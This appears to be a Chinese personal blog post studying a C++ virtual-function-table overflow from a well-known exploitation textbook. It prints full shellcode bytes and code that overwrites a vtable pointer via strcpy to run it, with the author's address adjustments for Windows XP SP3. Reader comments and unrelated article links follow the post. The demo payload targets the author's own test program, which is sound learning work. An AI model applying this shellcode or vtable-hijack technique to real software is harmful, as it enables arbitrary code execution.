文档章节

读0day攻击C++函数心得

余青木
 余青木
发布于 2014/01/05 23:42
字数 828
阅读 733
收藏 40

废话不说,直接上代码 原版代码:

#include "windows.h" #include "iostream.h" char shellcode[]= "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C" "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53" "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95" "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59" "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A" "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75" "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03" "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB" "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50" "\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"

 "\x1C\x88\x40\x00";

//set fake virtual function pointer

class Failwest 

{

 public: char buf[200]; 

virtual void test(void)

 { 

cout<<"Class Vtable::test()"<test();

 }

Failwest overflow, *p;

void main(void)

{

char * p_vtable;

p_vtable=overflow.buf-4;//point to virtual table

//__asm int 3

//reset fake virtual table to 0x004088cc

//the address may need to ajusted via runtime debug

p_vtable[0]=0xCC;

p_vtable[1]=0x88;

p_vtable[2]=0x40;

p_vtable[3]=0x00;

strcpy(overflow.buf,shellcode);//set fake virtual function pointer

p=&overflow;

p->test();

}

这是failwest书里原版代码。其附带的exe,经实测,可以在xp,sp3下运行。

但是很奇怪的是,我把源代码一字不改的重新在上述环境里编译后,却不能正常运行,不知道为什么。

于是,想到要改写程序,以适应实际的环境。

用paintf("%x\n",overflow.buf);得到overflow.buf为0x40BAAC

于是将源代码改写为

        p_vtable[0]=0xAC - 4;

p_vtable[1]=0xBA;

p_vtable[2]=0x40;

p_vtable[3]=0x00;

程序正常运行。
原因:将虚表指针p_vtable改写为0x40BAA8,则程序执行到p->test()时,将按照伪造的虚函数指针去0x40BAA8寻找虚表,而0x40BAA8地址值也为0x40BAA8,即为无效指令,对程序执行无影响。但是EIP+4,跳到了shellcode的起始地址处,开始执行了shellcode,于是程序正常运行。(见下图)


法二:

分析原代码可知:

p_vtable[0]=0xCC;

p_vtable[1]=0x88;

p_vtable[2]=0x40;

p_vtable[3]=0x00;

执行后,
0x4088CC指向shellcode的末尾,在这里填上shellcode的起始位置0x0040881c作为伪造的虚函数入口地址,程序将最终去执行shellcode。

那么0x4088CC是怎么来的呢?

也就是shellcode首地址0x40881C + 176(0B0h) = 0x4088CC ,176为不加最后四字节"\x1C\x88\x40\x00"的shellcode的长度。

既然这样,那就好办了。

得到在我的系统里overflow.buf为0x40BAAC,那么加上0B0h,得0x40BB5C,即

p_vtable[0]=0x5c;

p_vtable[1]=0xbb;

p_vtable[2]=0x40;

p_vtable[3]=0x00;

然后将shellcode最后的入口地址改为

"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"

"\xac\xba\x40\x00";//set fake virtual function pointer

即可。


虽然原理比较简单,但这次是我第一次正儿八经的写次博客,这么少的字,但是中途还是有让我不想写的念头。但觉得既然决定了,就好好的写下去,毕竟写技术博客只有好处,没有坏处。

以后会继续写下去,争取写得更通俗易懂。


© 著作权归作者所有

共有 人打赏支持
余青木
粉丝 2
博文 20
码字总数 6510
作品 0
拉萨
加载中

评论(3)

余青木
余青木

引用来自“Micooz”的评论

虚表地址固定的?

不是的
Micooz
Micooz
虚表地址固定的?
ericsoul
ericsoul
呃,没看懂。可能太难了。
篮子、水果和鸡蛋——关于C++的模板偏特化和萃取编程技法

最近在读《STL源码剖析》。读这本书的时候发现自己的C++的知识其实是非常匮乏的。 从大学的C++教材上学到一些C++基本的语法、内存管理、继承、多态等方面的基础知识。这些只是是一棵大树的根...

costaxu
2012/12/22
0
0
linux下IO口模拟I2C的一些总结

以前一直在用I2C接口,因为总是有线程的例子就一直没有去深入的了解,今天分析了一下在linux下通用GPIO模拟I2C的程序。 I2C的驱动是用杂项设备实现的,这也是一种比较简单的实现方式。通过 ...

luuuk
2013/05/20
0
0
C++11 中值得关注的几大变化

源文章来自前C++标准委员会的 Danny Kalev 的 The Biggest Changes in C++11 (and Why You Should Care),赖勇浩做了一个中文翻译在这里。所以,我就不翻译了,我在这里仅对文中提到的这些变...

雅各宾
2014/01/17
0
0
C语言/C++编程零基础入门到进阶知识学习

C语言是面向过程的,而C++是面向对象的 C和C++的区别: C是一个结构化语言,它的重点在于算法和数据结构。C程序的设计首要考虑的是如何通过一个过程,对输入(或环境条件)进行运算处理得到...

小辰带你看世界
04/01
0
0
STL list链表的用法详解

------------------------------------------------------------------------------- 原来... STL list链表的用法详解 本文以List容器为例子,介绍了STL的基本内容,从容器到迭代器,再到普通...

nao
2014/04/10
0
0

没有更多内容

加载失败,请刷新页面

加载更多

《Netkiller Java 手札》· 二进制文件操作大全

本文节选自《Netkiller Java 手札》 Netkiller Java 手札 Mr. Neo Chan, 陈景峯(BG7NYT) 中国广东省深圳市望海路半岛城邦三期 518067 +86 13113668890 <netkiller@msn.com> $Id: book.xml 6......

netkiller-
29分钟前
1
0
Fiddler Debugger post请求

常用的两种: 第一种默认的 对应URL为www 的要用请求头为:Content-Type: application/x-www-form-urlencoded 请求参数为 :param1=1234¶m2=12345 注:有些接口是指定用这种的第二方式并不...

轻量级赤影
37分钟前
3
0
如何搭建母婴亲子类知识社区

近期社交领域融资动作频繁,海尔高管、海尔医疗有限公司总裁管礼庆创办的母婴知识分享社区平台Alwayslove于上月获得700万天使轮融资。 Alwayslove是一个母婴知识分享社区平台,采用UGC模式,...

ThinkSNS账号
39分钟前
1
0
Android 自定义构建类型 BuildType

最近接触到自定义构建类型 BuildType,发现这一块有些地方稍不注意的话会被绕进去浪费点时间,既然我这边已经花费时间了,如果正好你也需要接触到 BuildType,也许接下来分享的 tips 可能会帮...

猴亮屏
40分钟前
1
0
美团点评基于 Flink 的实时数仓建设实践

引言 近些年,企业对数据服务实时化服务的需求日益增多。本文整理了常见实时数据组件的性能特点和适用场景,介绍了美团如何通过 Flink 引擎构建实时数据仓库,从而提供高效、稳健的实时数据服...

美团技术团队
43分钟前
5
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部